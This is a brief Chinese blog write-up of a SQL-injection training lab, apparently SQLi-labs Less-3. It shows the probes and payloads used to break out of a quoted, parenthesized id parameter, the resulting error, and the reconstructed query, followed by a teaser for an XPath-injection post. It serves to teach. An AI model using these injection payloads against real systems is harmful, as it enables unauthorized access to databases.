源码:
未过滤,但变量id加了引号和括号。将变量id以字符串形式引入,和Less-1很像,但是却又多了个括号,猜测是防止注入语句。
注入测试:
?id=12+and+1=1 显示正确
?id=12+an 不完全语句也显示正确
猜测:括号将变量限制在括号范围内,尝试手动提前匹配括号注入。
?id=12%27 成功报错:''12'') LIMIT 0,1' at line 1
?id=1%27%29and+1=2%23 无显示,可注入
上面那条语句还原到SQL语句时,为:
SELECT * FORM users WHERE id=('1')and 1=2#') LIMIT 0,1
将括号提前结束且用#号注释掉接下来的语句。接下来的注入只要替换and 1=1语句就行了。
FROM :rickyhao.com | rickyhao.com
0x00 在某次的萌新比赛中,队友出了题XPath注入。突然发现已经忘了如何做。。还是在这里稍微总结下 0x01 <bookstore> <book category="COOKING"> <title lang="en">…
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论